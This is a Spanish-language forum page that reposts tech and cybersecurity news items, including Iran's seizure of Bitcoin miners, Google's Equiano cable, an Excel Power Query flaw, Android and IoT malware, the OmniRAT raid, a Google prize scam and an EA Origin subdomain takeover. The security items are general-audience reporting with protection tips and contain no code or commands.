Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Dragora

#2801

Irán incauta 1.000 máquinas destinadas a minar Bitcoin después de que subiese un 7% el consumo de electricidad

La electricidad en Irán es especialmente barata, por otra parte minar criptomonedas requiere de mucha electricidad. No es difícil unir los puntos, Irán se ha convertido en un lugar ideal para minar estas divisas, tanto que el consumo eléctrico en el país se ha disparado un 7% en las últimas semanas. Para mitigar el problema en las últimas horas las autoridades locales han incautado 1.000 ordenadores destinados a esta actividad, destinadas a minar Bitcoin.

Según indica Reuters, las autoridades de Irán se han hecho con 1.000 máquinas para minar Bitcoin encontradas en dos fábricas que supuestamente estaban abandonadas. Según ha explicado un responsable a la televisión estatal, estas máquinas estaban consumiendo hasta un megavatio.


Una actividad rentable e ilegal en Irán


Tal y como comentan en Magnet, el kilowatio/hora en Irán sólo cuesta unos 0,005 euros frente a los más de 0,11 euros que cuesta en España por ejemplo. Esta brutal diferencia hace que los costes del minado de Bitcoin sean muy bajos en comparación con otros lugares del mundo. Si a esto se le suma que en algunos edificios públicos el estado concede prácticamente gratis la electricidad inevitablemente surgen granjas de Bitcoin donde menos se les espera, por ejemplo en mezquitas.




Las criptomonedas están prohibidas en Irán por su alta volatilidad y el temor a que sean utilizadas para blanquear dinero. Pero estos costes tan bajos han hecho que cada vez se mine más en el país. El pico de energía se ha dado durante este mes de junio, que ha aumentado el consumo general un 7%. Las autoridades achacan este aumento precisamente al minado de criptomonedas.

A pesar de la retirada de 1.000 ordenadores destinados a minar criptomonedas, parece ser que aún hay mucho trabajo por delante. Agentes externos provenientes por ejemplo de China se ha reportado que han ingresado en el país miles de ordenadores para esta tarea. Es una tarea complicada y de alto riesgo, aunque por el empeño parece ser que sigue compensando y siendo rentable.






Los efectos del valor del Bitcoin


Bitcoin ha cobrado protagonismo de nuevo estas últimas semanas. A principios de mes su valor rondaba los 7.500 dólares pero ha tenido una creciente subida durante estos días, superando de largo los 10.000 dólares el pasado 24 de junio por ejemplo. Dos días después, el 26 de junio, consiguió su máximo de casi 13.000 euros, aunque en las últimas horas ha vuelto a desplomarse varios miles de dólares.

Si esta considerable bajada del Bitcoin es repercusión de la guerra que le ha declarado Irán es algo difícil de afirmar. Facebook y múltiples empresas más prefieren buscar ofrecer una alternativa propia y algo más estable: Libra.












Vía: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#2802

El mundo está interconectado entre sí gracias a los cables submarinos, los cuales permiten que países que estén en una u otra punta del mundo se comuniquen. A pesar de que SpaceX quiere que parte de ese tráfico pase por sus satélites, los cables submarinos siguen siendo la mejor vía en la actualidad para comunicar países y continentes. Y Google es una de las compañías que más recientemente se ha sumado a esta aventura.


Google apuesta fuerte por los cables submarinos: ya está presente en el 10% de ellos en todo el mundo


En España tenemos multitud de cables submarinos que nos conectan con el resto del mundo; sobre todo gracias a la ubicación geográfica de nuestro país. Uno de los más recientes y populares fue Marea, que cuenta con financiación de Telefónica, Facebook y Microsoft, y que nos conecta directamente a Estados Unidos a través de Bilbao, y que ha permitido reducir la latencia de las conexiones con el país.


Ahora, Google ha anunciado el despliegue del decimocuarto cable submarino en el que ha sido inversor, y el tercer cable submarino internacional que ha sido financiado enteramente por ellos. Su nombre es Equiano (en honor a Oludah Equiano, escritor, esclavo y abolicionista nacido en Nigeria), y tendrá tres puntos de interconexión: Lisboa (Portugal), Lagos (Nigeria) y Ciudad del Cabo (Sudáfrica). Así, este será el primer cable de Google que irá desde Europa hasta África.

0
El primer proyecto de cable submarino donde Google participó fue Unity en 2010, que une Chikura (Japón) con Redondo Beach (California). Su longitud es de 9.620 km. El primero financiado enteramente por ellos fue Junior, que arrancó el año pasado y va desde Rio de Janeiro a Santos en Brasil, con una longitud de sólo 390 km. Curie fue su primer cable intercontinental, abierto hace dos meses con una longitud de 10.000 km desde Los Ángeles hasta Valparaíso (Chile). El primero intercontinental financiado por ellos fue Dunant, desde Estados Unidos a Francia, y estará operativo a finales de 2020.




Además de las 3 conexiones iniciales de Portugal, Nigeria y Sudáfrica, se harán hasta otros nueve enganches como se pueden ver en el mapa representados por un triángulo. Estos enganches serán para futuras conexiones a otros países. El cable seguirá una ruta muy similar a la que siguen otros cables similares en la actualidad, como el cable ACE desplegado en 2012 que, además de a Lisboa, también llega hasta Francia. El cable se construirá por Alcatel Submarine Networks, donde la primera fase del cable se completará en 2021.


Equiano tendrá 20 veces más capacidad que otros cables que hacen el mismo recorrido


Equiano será bastante diferente a ACE por varios motivos. A nivel tecnológico, éste será el primer cable submarino del mundo en incorporar conmutación óptica en el par de fibra en lugar de hacer la conmutación a nivel de longitud de onda como se hace actualmente. Esto da una mayor flexibilidad para reubicar la capacidad de los cables. Además, el cable soportará hasta 20 veces más ancho de banda gracias a la tecnología de fibra óptica «space-division multiplexing» (SDM).

Google, al igual que Facebook o Microsoft, tienen interés en llevar la conexión a Internet a todo el mundo, y en que ésta mejore en velocidad, prestaciones y capacidad. La mayoría de personas que acceden a Internet desde un móvil usa servicios de Google o Facebook, así que cuanto más acerquen las redes a zonas que todavía tienen mucho margen de crecimiento, más dinero ganarán.

En todo el mundo hay actualmente 400 cables submarinos, que miden en total 1,1 millones de kilómetros. Google tiene presencia en algo menos del 10% de ellos. Facebook, por ejemplo, está planeando un cable que rodee toda África, y Microsoft ha sido la primera en abrir un centro de datos en el continente. Amazon abrirá también próximamente uno de AWS, y Google no tardará en hacer lo propio.












Vía: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#2803

Cuidado si usas Excel, un fallo en una de sus herramientas permite ocultar malware en las hojas de cálculo

Office, la suite ofimática de Microsoft, es la más utilizada a nivel mundial por los usuarios de Windows y macOS, ya que es una de las más completas y potentes que podemos encontrar y que nos permite sacarle todo el provecho a nuestra productividad. Microsoft Office se utiliza tanto en entornos domésticos como en entornos profesionales, y por ello los piratas informáticos siempre buscan la menor oportunidad para poder poner en peligro la seguridad de todos estos usuarios, y esta oportunidad siempre aparece donde menos se espera, como acaba de ocurrir con la herramienta Power Query.

Power Query, herramienta más conocida en español como «Obtener y transformar» a partir de Excel 2016, es una función que ofrece a los usuarios una nueva experiencia, mucho más intuitiva y coherente, para descubrir, combinar y completar datos que pueden venir de una gran variedad de fuentes, como, por ejemplo, relacionados, estructurados y semiestructurados, OData, Web y Hadoop, entre otros mucho orígenes más.

Hace algunas horas, los investigadores de seguridad de Mimecast Threat Center daban a conocer un nuevo fallo de seguridad encontrado en Excel, concretamente en esta herramienta que acabamos de mencionar. Esta vulnerabilidad permite a cualquier pirata informáticos aprovecharse de Power Query para llevar a cabo un ataque DDE (Dynamic Data Exchange) en una hoja de cálculo correctamente modificada para dicho fin, pudiendo ocultar un payload en ella y tenerlo controlado de forma remota.

Así, los investigadores de seguridad han encontrado la forma de usar esta herramienta de Office para ocultar código dentro de los datos de las hojas de cálculo, infectando de forma remota a los usuarios con solo abrir dicha hoja de cálculo modificada, no se necesita hacer nada más.


Cómo protegernos de estos ataques informáticos basados en Excel

Mimecast ya informó a Microsoft de este fallo de seguridad hace varios meses con su correspondiente PoC, sin embargo, la compañía no ha dado señales de vida desde entonces, por lo que, según parece, no tiene muchas intenciones de solucionar este problema de seguridad. No es la primera vez que se han descubierto fallos similares en las aplicaciones de MS Office y, según Microsoft, haciendo alusión a la mítica frase «It's not a bug, it's a feature«, no eran considerados fallos de seguridad, sino más bien las herramientas habían sido diseñadas así y, por lo tanto, no se iba a solucionar nada.

Aunque Microsoft sí ha compartido una guía para configurar las opciones DDE de la forma más segura posible para evitar ataques, el público potencialmente vulnerable es muy grande, y Microsoft no tiene intención de ayudarlos.

La firma de seguridad que ha dado a conocer esta vulnerabilidad recomienda que, en entornos profesionales, los administradores de sistemas configuren correctamente las instancias de Excel para evitar posibles brechas de seguridad al descargar y abrir documentos vulnerables.

En caso de ser usuarios domésticos, debemos extremar las precauciones al descargar archivos de Excel desde Internet, y, si no necesitamos todas las funciones y herramientas de esta suite ofimática, podemos optar por usar otras más sencillas, como LibreOffice, pero que no sean vulnerables y nos permitan estar seguros.







Vía: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#2804

Identificados a 200 metros: 'Jetson' es el nuevo láser del Pentágono capaz de reconocer personas a gran distancia por los latidos del corazón

El corazón de cada persona es único, del mismo modo que tenemos diferentes huellas dactilares o un rostro distinto. Por ello, el ritmo cardíaco puede ser utilizado como método para identificarnos. En el lado negativo se encuentra que requiere de sensores más precisos, pero por el contrario tiene una ventaja clara: se puede identificar a alguien a una distancia considerable.

Utilizando este conocimiento, el Pentágono de los EEUU tiene un nuevo láser capaz de identificar a personas a una distancia de 200 metros. Un método biométrico pensado para reconocer y confirmar la identidad de posibles terroristas antes de efectuar un ataque teledirigido.

Un nuevo método biométrico que EEUU está explorando para combatir al terrorismo

Como informa MIT Technology Review, este nuevo láser se trata de un proyecto de la Oficina de Apoyo Técnico contra el Terrorismo (CTTSO). Una herramienta que podemos encontrar entre las tecnologías anunciadas y completadas por el Departamento de Defensa para este año.

'Jetson' es el nombre en clave de este dispositivo desarrollado para capturar la identificación cardíaca de individuos a 200 metros. Según explica el documento, los métodos biométricos actuales requieren de muchos píxeles para poder aplicar los algoritmos, además que un ligero movimiento o cambios faciales como unas gafas pueden entorpecer la identificación. Con la identificación cardíaca se solucionan algunos de estos problemas y además se consigue hacerlo a una mayor distancia.




Utilizar un láser para medir el pulso no es algo nuevo y con sensores infrarrojos ya se suele utilizar en el ámbito de la salud. Lo que hacen es medir los cambios y las reflexiones de la luz causadas por el movimiento de la sangre. Aunque en el caso de Jetson se utiliza otro método. En este caso se aplica un sistema de vibrometría capaz de detectar los movimientos en el cuerpo causados por el ritmo cardíaco. Una detección ultra precisa que funcionaría igualmente con ropa puesta, sea una camiseta o una chaqueta aunque no un abrigo más grueso.

El método no está exento de problemas. El sistema requiere de una estabilidad enorme. Tal es así, que el Departamento de Defensa ha construido una coraza que protege el láser y lo aisla de las vibraciones. Jetson dispone además de un estabilizador, como si fuera un gimbal, que mantiene el láser en el objetivo. ¿Cuánto tiempo requiere el láser para identificar a alguien? Alrededor de 30 segundos, según explica MIT Technology Review. Un tiempo suficiente alto para que únicamente sea efectivo con objetivos sentados o esperando.

Según Steward Remaly, de la CTTSO, "Jetson puede identificar a alguien con un 95% de precisión en buenas condiciones, o incluso más". Un número bastante elevado y que en la práctica colocaría a este sistema de identificación cardíaca a un nivel similar al de otros sistemas como el reconocimiento facial.


Esta posición es compartida por Wenyao Xu de la Universidad de Nueva York en Buffalo: "Comparado con el reconocimiento facial, la biometría cardíaca es más estable y puede alcanzar más del 98% de precisión". Una afirmación que el investigador dice debido a que él también ha desarrollado un sensor para identificar a personas a distancia mediante el ritmo cardíaco, aunque en este caso a un máximo de 20 metros y utilizando un radar

Para la realización de esta identificación se requiere el uso de una gran base de datos de firmas cardíacas. Sin embargo, las fuerzas armadas de los EEUU en países como Irak o Afganistán ya recogen de manera rutinaria los datos biométricos de muchas personas, por lo que crear una biblioteca de referencia no sería un problema.





Vía: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#2805

VideLeaker, la nueva amenaza que espía a las víctimas con la cámara y micrófono del móvil; así puedes protegerte

Dentro de todas las amenazas que podemos encontrarnos en la red, sin duda el malware para móviles está en constante aumento. La razón es lógica: cada vez hay más usuarios que utilizan este tipo de dispositivos y es ahí donde los ciberdelincuentes ponen sus miras. Hoy nos hacemos eco de un nuevo malware denominado VideLeaker que afecta a dispositivos Android. Su objetivo es hacerse con el control de la cámara y micrófono para espiar a la víctima. Vamos a dar algunos consejos para evitarlo.


ViceLeaker, el nuevo malware para Android que espía con la cámara y micrófono

Este malware llamado VideLeaker ha sido descubierto por un grupo de investigadores de seguridad de Kaspersky que afirman que el atacante podría obtener el control casi total del dispositivo. Podría manejar la cámara del móvil, el micrófono, borrar archivos, instalar aplicaciones... Es, por tanto, una amenaza bastante importante.

Como hemos mencionado afecta a los usuarios que utilizan Android. Ya sabemos que el sistema operativo de Google es hoy en día el más utilizado en dispositivos móviles. Es por ello que pueden ser muchos los usuarios afectados por este problema.

En este caso estamos ante una amenaza que se basa en una aplicación legítima que podemos encontrar en Google Play. Concretamente hablamos de Conversations. Logran modificar su código fuente para distribuir el malware entre los usuarios. Sin embargo los investigadores aseguran que no hay rastro de este código malicioso en esa aplicación.

Este malware utiliza HTTP para comunicarse con el servidor C2 para controlar los comandos y lograr robar los datos de los usuarios. Hay que mencionar que los atacantes lograron modificar el icono de la aplicación y hacer que se parezca a Telegram y de esta forma ocultar lo que realmente pretenden.



Cómo protegernos de esta amenaza y otras similares

Lo más importante para evitar el malware en dispositivos Android es descargar siempre de fuentes oficiales. De esta forma es muy importante bajar los programas de Google Play. Es cierto que esto por sí solo no garantiza al 100% que estemos instalando algo totalmente seguro, pero sin duda aporta más garantías de que sí lo sea. Hay que evitar sitios de terceros que puedan modificar las aplicaciones con software malicioso.

También es muy importante tener el sistema actualizado, así como las diferentes aplicaciones que utilicemos. En ocasiones pueden surgir vulnerabilidades que son utilizadas por los ciberdelincuentes. Se aprovechan de esos fallos para distribuir sus ataques y obtener beneficio.Además, siempre es conveniente contar con programas y herramientas de seguridad para Android.

Es la manera que tenemos de proteger los sistemas y detectar posibles problemas con el software que instalamos o las páginas que visitamos. Es importante tener un  buen antivirus que nos alerte en caso de anomalías.

Pero sin duda algo que no puede faltar es el sentido común. En muchos casos este tipo de amenazas se ejecutan por la interacción del usuario. Hay que tener siempre en cuenta el riesgo que existe al navegar. Nunca debemos entrar en links que recibamos sin conocer realmente la fuente, por ejemplo. Podría tratarse de un ataque Phishing, entre otras amenazas.






Vía: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#2806

El proyecto DOSBox es un fantástico emulador del sistema operativo MS-DOS que podemos instalar en Linux para poder ejecutar videojuegos clásicos y programas nativos de este antiguo sistema de Microsoft. Seguramente ya lo conozcas, con él podrás resucitar gran cantidad de software antiguo y es de lo más fácil de usar. De hecho, ya hemos dedicado algunos artículos en LxA explicando su funcionamiento, etc.

En los últimos tiempos, el proyecto parecía algo muerto. Pero la verdad es que no lo está. Se ha vuelto a actualizar con un bug que ha sido corregido. La verdad es que funciona bien ya, pero no está mal que se siga puliendo. Puedes visitar la web oficial de DOSBox para obtener más información del proyecto, documentos y descargar la última versión de este emulador si lo necesitas. La versión es la DOSBox 0.74 y la mejora tiene que ver con la seguridad...




DOSBox sigue vivo y los cambios agregados son:

- Se ha corregido un problema que llevaba presente bastante tiempo.

- Se trata de un bug que causaba un desbordamiento de bufer y afectaba a la seguridad. Puedes ver más información buscando el código CVE-2019-7165 (de Alexandre Bartel) con el que ha sido marcada esta vulnerabilidad.

- Además, se ha añadido un sistema de permisos básico para que los programas que están corriendo dentro de DOSBox no puedan acceder al contenido de /proc, y esto también tiene que ver con la seguridad.

- Se ha marcado la vulnerabilidad como CVE-2019-12594, también descubierta por Alexandre Bartel.

- Otros bugs presentes que afectaban también a la seguridad se han solventado.

- Y también se han corregido algunos problemas relacionados con el renderizado con OpenGL.

Ahora, la nueva versión DOSBox 074-2 es más segura, aunque no hay diferencias en cuanto a funciones nuevas o a otras mejoras. Además, el equipo de desarrollo continúa trabajando en la nueva versión DOSBox 0.75 que veremos pronto y que también traerá mejoras.




Vía: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#2807

La policía alemana allanó ayer la casa del desarrollador de OmniRAT y se apoderó de su computadora portátil, computadora y teléfonos móviles, probablemente como parte de una investigación sobre un reciente ataque cibernético, dijo una fuente a The Hacker News.
OmniRAT llegó a los titulares en noviembre de 2015 cuando su desarrollador lo lanzó como una herramienta de administración remota legítima para que los expertos de TI y las compañías administren sus dispositivos con permisos explícitos.

Disponible entre $ 25 y $ 100, OmniRAT se convirtió rápidamente en una de las herramientas de administración remota más populares, permitiendo a los usuarios monitorear dispositivos Android, Windows, Linux y Mac de forma remota y acceder a toda la información disponible sobre ellos.

Sin embargo, al igual que cualquier otra herramienta de administración remota como DroidJack, DarkComet, AndroRAT y njRAT, algunos clientes de OmniRAT también utilizaron la herramienta para fines ilícitos, especialmente porque estaba disponible a un precio mucho más barato que otros RAT en el mercado.

En uno de estos eventos a principios de este año, un grupo de piratas informáticos intentó atacar varias industrias explotando una antigua vulnerabilidad de ejecución remota de código ( CVE-2016-7262 ) en Microsoft Excel que finalmente instaló OmniRAT en las computadoras seleccionadas.

Según un investigador de seguridad que informó sobre este incidente en enero, los atacantes utilizaron una hoja de Excel con formato incorrecto que se disfrazaba como perfil empresarial de "Kuwait Petroleum Corporation ( KPC )" para atraer a sus víctimas a abrir el archivo adjunto.

Aunque Kuwait Petroleum Company no fue atacada por el malware, otra fuente anónima dijo a The Hacker News que hace casi dos meses, los abogados que representan a la compañía petrolera comenzaron a enviar un correo electrónico al registrador de dominios desde donde estaba registrado el dominio oficial de OmniRAT y les exigió que revelaran el identidad del propietario del dominio, citando las reglas GDPR e ICANN relacionadas con whois.







El contenido en el sitio web oficial de OmniRAT no ha estado disponible desde los últimos días, lo que probablemente ha sido eliminado por su desarrollador para evitar que su registrador de dominio revele su identidad a la empresa.
Al parecer, el desarrollador de OmniRAT reside en Alemania, pero su identidad aún es desconocida para el público.

En este momento, no está claro si la redada de la policía alemana está relacionada con los esfuerzos realizados por la Compañía Petrolera de Kuwait o si involucra algún caso penal separado en su contra.

También es posible que la policía alemana esté detrás de la lista y la identidad de todos los clientes que compraron OmniRAT en los últimos cuatro años para acabar con los ciberdelincuentes que abusan de la herramienta.

En una operación similar en 2015, las agencias de aplicación de la ley en varios países allanaron hogares y arrestaron a presuntos usuarios de malware de teléfonos inteligentes DroidJack.
Aunque crear malware o una herramienta de pirateo es ilegal en Alemania, como en muchos otros países, también depende de cómo se haya anunciado la herramienta.

Porque al igual que las herramientas de prueba de penetración, las herramientas de administración remota también son una espada de dos caras y se pueden usar para fines legales e ilegales.
En un caso, se informó que hace dos años un grupo de piratas informáticos estaba usando OmniRAT para espiar a los miembros y simpatizantes del Estado Islámico (ISIS) distribuyendo su versión de Android a través de la popular aplicación de mensajería Telegram.
Un descargo de responsabilidad, tal como se comparte a continuación, publicado en el sitio web oficial de OmniRAT también dice que la herramienta no es para piratería y que los clientes son responsables de cualquier mal uso.

"OmniRAT es creado por autores alemanes y los servidores también están ubicados en Alemania. Por lo tanto, la ley alemana se aplica a nosotros. OmniRAT es una herramienta de administración remota (rata). No es, como muchos creen, un troyano creado para piratería informática; por lo tanto, no es ilegal y no viola la ley. Sin embargo, el uso es únicamente lícito en los dispositivos que posee o tiene permiso. Esto también se establece en nuestros términos de servicio. Al comprar y usar OmniRAT, usted cumple con lo anterior. . "

A pesar de que el desarrollador de OmniRAT no parecía haber alentado directamente a sus clientes a usar la herramienta para espiar a alguien, a fines del año pasado, publicó una descripción y nuevas características de su herramienta en un infame foro de hacking, un sitio web famoso entre los novatos por encontrar Herramientas de hacking en el mercado.


En el mismo foro de piratería, en abril de este año, anunció el cierre de OmniRAT y dijo que "desafortunadamente, debido a la presión del gobierno y la división de delitos cibernéticos, OmniRAT debe cerrarse. Esto tendrá efecto inmediato".

Sin embargo, dado que el funcionamiento de la herramienta no confía directamente ni comparte los datos del dispositivo recopilados con el servidor OmniRAT, los usuarios que ya tienen acceso a la herramienta de administración remota pueden continuar usándola para cualquier propósito que deseen.







Vía: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#2808

No, Google no te va a pagar 2,5 millones de dólares por usar sus servicios; así es la nueva estafa para robar tus datos

Las estafas en Internet están a la orden del día. Hay múltiples intentos de engaño que tienen como objetivo final lograr las credenciales de los usuarios, las contraseñas o simplemente tener información. La cuestión es que en ocasiones son poco sofisticados y lanzan campañas poco creíbles pero que, visto que repiten, tendrán éxito. Hoy nos hacemos eco de la nueva estafa que llega a través del correo electrónico. Aseguran ofrecer una recompensa de nada menos que 2,5 millones de dólares por ser un usuario fiel a los servicios de Google.

Una nueva estafa promete un premio de 2,5 millones de dólares de parte de Google


Está claro que Google y todos los servicios asociados cuentan con millones de usuarios en todo el mundo. Eso hace que, aunque sea por probabilidad, los atacantes puedan tener éxito en algunas víctimas. Aunque no sea creíble que nos paguen 2,5 millones de dólares por utilizar muchísimo los servicios de Google, siempre habrá quien pique en el anzuelo.

Los ciberdelincuentes suplantan la identidad de Google. Se hacen pasar por miembros del gigante de las búsquedas para dar credibilidad a su correo electrónico que tiene como objetivo ganarse la confianza de la víctima. Se hacen pasar, concretamente, por un director gerente de la compañía.

Junto al mensaje se adjunta un PDF donde viene la información del premio que se otorga mediante MasterCard o Visa. En total, como hemos mencionado, son 2,5 millones de dólares.Lógicamente lo que buscan los atacantes es obtener toda la información posible de las víctimas que piquen en el anzuelo. Si queremos reclamar ese premio hay que rellenar un formulario donde nos piden datos como nuestro nombre, dirección, cuenta bancaria, edad... Incluso, para ganar aún más la confianza de la víctima, también piden que indiquemos cómo de conformes estamos con los servicios de Google.

Al final del mensaje añaden que todos esos datos serán almacenados de manera 100% segura y privada. Únicamente se utilizará esa información para fines de otorgar el premio y nada más.




Cómo evitar este tipo de estafas


Lo primero que podemos hacer para evitar recibir este tipo de estafas es proteger nuestra cuenta de correo. Es importante que no la hagamos pública en foros abiertos o páginas. De esta forma podría ser utilizada para incluirla en campañas de Spam que, entre otras cosas, envíen correos maliciosos como este que indicamos.
La información en Internet es muy valiosa hoy en día. No hablamos únicamente de saber la cuenta bancaria o las contraseñas, sino también simplemente nuestro nombre, edad, gustos, cuenta de correo... Es información que puede ser utilizada para campañas de marketing por las empresas.

Es muy importante que nunca contestemos a este tipo de correos, incluso aunque nos pidan solo confirmar que lo hemos recibido para darnos algo a cambio. Si lo hacemos estaremos confirmando que realmente hay un usuario activo detrás de esa cuenta.

Por supuesto nunca hay que acceder a links que recibamos por correo electrónico para iniciar sesión en nuestras cuentas. Puede tratarse de un ataque Phishing y en realidad lo que buscan es robar nuestras credenciales y contraseñas. Hay que entrar siempre desde las páginas oficiales a través del navegador o aplicaciones.






Vía: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#2809


Este malware creado por un niño pone en riesgo miles de dispositivos IoT; así puedes evitarlo fácilmente

Cuando entramos en la red podemos toparnos con múltiples variedades de malware y amenazas que comprometen los dispositivos. Por suerte tenemos también muchas opciones de software para protegernos. Hoy nos hacemos eco de un nuevo malware llamado Silex y que ha sido desarrollado por un niño de 14 años. La cuestión es que está logrando su objetivo y está infectando a miles de dispositivos IoT. Por suerte es muy sencillo protegernos y vamos a explicarlo.


Silex, el malware creado por un niño que pone en riesgo miles de equipos IoT

Este malware denominado Silex se basa en otro malware llamado BrickerBot y que ya afectó a millones de equipos en todo el mundo hace un par de años. Esta vez, esta nueva amenaza creada por este adolescente tiene como objetivo atacar a lo que conocemos como el Internet de las Cosas.

Ya sabemos que los usuarios cuentan cada vez con más equipos conectados a la red en su hogar. No hablamos solo de ordenadores y móviles, sino de otras muchas variedades como televisiones, bombillas y muchos más dispositivos. El problema es que la seguridad en ocasiones no está presente por dejadez o desconocimiento de los usuarios.

Los dispositivos IoT se han convertido en objetivo para los ciberdelincuentes. Ven aquí una gran oportunidad para acceder a la red de la víctima. En el caso de Silex se aprovecha de las credenciales predeterminadas de esos dispositivos. En caso de poder acceder a ellos podrían borrar el almacenamiento, configurar a su antojo el firewall y modificar la configuración de red. Básicamente obtener el control total sobre ese equipo.

Lógicamente los dispositivos dejarían de funcionar correctamente. Estamos hablando de equipos que en ocasiones tienen un precio bastante bajo, por lo que podrían ser reemplazados por uno nuevo. La solución pasaría por volver a instalar el firmware de nuevo, algo que muchos usuarios no harían por desconocimiento o porque simplemente crean más conveniente adquirir uno nuevo.


No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Cómo evitar ser víctima de este problema


Como hemos mencionado, este malware denominado Silex se aprovecha de las credenciales predeterminadas que traen los dispositivos IoT. Es sin duda uno de los mayores errores que cometen los usuarios: dejar los valores predeterminados de fábrica sin cambiar. Por tanto nuestro primer consejo para evitar no solo ser víctima de este problema, sino también de otros similares, es cambiar siempre las credenciales. Una solución muy sencilla, pero eficaz. Es importante no mantener la contraseña que viene de fábrica y generar una fuerte y compleja.

Es vital que esa clave que vamos a generar contenga letras (mayúsculas y minúsculas), números y otros símbolos especiales. Tiene que ser totalmente aleatoria, única y que no contenga datos personales. Así podremos aumentar la fortaleza de ese equipo.También es muy importante tener los dispositivos actualizados. En ocasiones puede haber vulnerabilidades que son aprovechadas por los ciberdelincuentes. Los propios fabricantes pueden lanzar parches y actualizaciones de seguridad para corregir estos errores. Tenerlos instalados puede ayudar a que nuestros dispositivos estén seguros y no sean objeto de ataques.

Otro consejo interesante es observar el control remoto de los dispositivos. En caso de que no sea realmente importante para su funcionamiento siempre podremos desactivarlo. Así evitaremos posibles ataques externos.









Vía: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#2810

Microsoft agrega "Vault personal" protegido por 2FA dentro del almacenamiento en la nube de OneDrive


Microsoft ha introducido una nueva carpeta protegida por contraseña dentro de su servicio de almacenamiento de archivos en línea OneDrive que le permitirá mantener sus archivos importantes y protegidos protegidos y protegidos con una capa adicional de autenticación.

Apodado como Personal Vault , solo se puede acceder a la nueva carpeta OneDrive con un paso adicional de verificación de identidad, como su huella digital, rostro, PIN o un código de autenticación de dos factores que se le envía por correo electrónico o SMS.

La carpeta de Personal Vault aparecerá junto a otras carpetas en la aplicación OneDrive como Documentos e Imágenes, pero se bloqueará y le pedirá un código adicional cada vez que intente acceder a ellas a través de la web, la PC o los dispositivos móviles. Manteniéndolos más seguros en caso de que alguien obtenga acceso a su cuenta o dispositivo.


Microsoft sugiere que esta nueva área protegida en OneDrive sería útil para que los usuarios almacenen archivos más confidenciales y personales, como copias de pasaportes, impuestos, documentos de automóviles o del hogar, tarjetas de identificación e información financiera, por ejemplo.

Para almacenar instantáneamente sus archivos en la carpeta de Personal Vault, todo lo que necesita hacer es escanear sus documentos directamente en su Personal Vault a través de la aplicación OneDrive. Incluso puedes tomar fotos y grabar videos con OneDrive y enviarlos directamente a Personal Vault.

Puede almacenar tantos archivos como desee en la carpeta de Personal Vault, hasta su límite de almacenamiento total de OneDrive. Microsoft también está aumentando el plan de almacenamiento básico de OneDrive de 50 GB a 100 GB sin costo adicional.



Personal Vault, de forma predeterminada, incluye todas las protecciones que OneDrive ofrece actualmente, incluido el cifrado de archivos "en reposo" en la nube de Microsoft y en tránsito a un dispositivo, protección contra ransomware, eliminación y recuperación masiva de archivos, monitoreo de actividad sospechosa, análisis de virus en la descarga para su conocido Amenazas, y el historial de versiones para todos los tipos de archivos.

Además, cuando la aplicación OneDrive sincroniza sus archivos de Personal Vault con su computadora, los almacena directamente en un área cifrada con BitLocker de su disco duro local en su computadora con Windows 10, en lugar de en cualquier carpeta normal.


"Para una mayor protección en dispositivos móviles, recomendamos que habilite el cifrado en su dispositivo iOS o Android", dice Microsoft. "Juntas, estas medidas ayudan a mantener sus archivos protegidos, incluso si pierde su PC con Windows 10 o su dispositivo móvil, si es robado o si alguien accede a él".

Que es mas Después de un período de inactividad (3 minutos en dispositivos móviles y 20 minutos en la web o en el disco duro local de forma predeterminada), el Personal Vault se volverá a bloquear automáticamente y tendrá que volver a autenticarse para obtener acceso nuevamente.

Además, si intenta acceder a OneDrive de forma remota a través de un navegador web en una PC desconocida, el navegador no guardará sus archivos dentro de la Bóveda personal en su caché.
Microsoft está poniendo a disposición la función OneDrive Personal Vault para la versión web de su PC OneDrive, Windows 10, así como las aplicaciones móviles iOS y Android.
OneDrive Personal Vault actualmente solo se está implementando en Australia, Nueva Zelanda y Canadá, aunque la compañía lo pondrá a disposición de todos los mercados para fines de año.










Vía: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[/color]
#2811


Una plataforma de juego popular utilizada por cientos de millones de personas en todo el mundo se ha encontrado vulnerable a múltiples fallas de seguridad que podrían haber permitido a los piratas informáticos remotos tomar las cuentas de los jugadores y robar datos confidenciales.

Las vulnerabilidades en cuestión residen en la plataforma de distribución digital "Origin" desarrollada por Electronic Arts (EA), la segunda compañía de juegos más grande del mundo con más de 300 millones de usuarios, que permite a los usuarios comprar y jugar algunos de los videojuegos más populares, incluido Battlefield. , Apex Legends, Madden NFL, y FIFA.
La plataforma Origin también administra a los usuarios la autenticación de cuenta de EA Games y les permite encontrar amigos, unirse a juegos y administrar sus perfiles.

Descubiertas por investigadores en Check Point y CyberInt, las vulnerabilidades cuando se encadenan podrían haber permitido a los atacantes secuestrar la cuenta de EA del jugador simplemente convenciéndolos de que abran una página web oficial desde el sitio web de EA Games.
Para realizar este ataque, como se muestra en la demostración en video, los investigadores aprovecharon una debilidad no parcheada conocida en el servicio de nube de Azure de Microsoft que les permitió tomar el control de uno de los subdominios de EA, que anteriormente estaba registrado en Azure para albergar uno de los Origenes. servicios.




Como se explicó en un informe anterior , si el DNS (CNAME) de un dominio / subdominio apunta a la plataforma en la nube de Azure pero no se ha configurado o vinculado a una cuenta de Azure activa, cualquier otro usuario de Azure puede secuestrarlo para estacionar ese subdominio en su / su servidor de Azure.

"Sin embargo, durante la investigación de Cyber ​​Int, [it] descubrió que el servicio No tienes permitido ver enlaces. Registrate o Entra a tu cuenta ya no estaba en uso dentro de los servicios en la nube de Azure; sin embargo, el único subdominio No tienes permitido ver enlaces. Registrate o Entra a tu cuenta todavía redirige a él usando La configuración de CNAME ", dijeron los investigadores de CheckPoint en un informe  publicado hoy.

En su ataque de prueba de concepto, los investigadores secuestraron "eaplayinvite.ea.com" y presentaron un script en él que aprovechaba las debilidades en el inicio de sesión único (SSO) de los juegos de EA y el mecanismo TRUST.


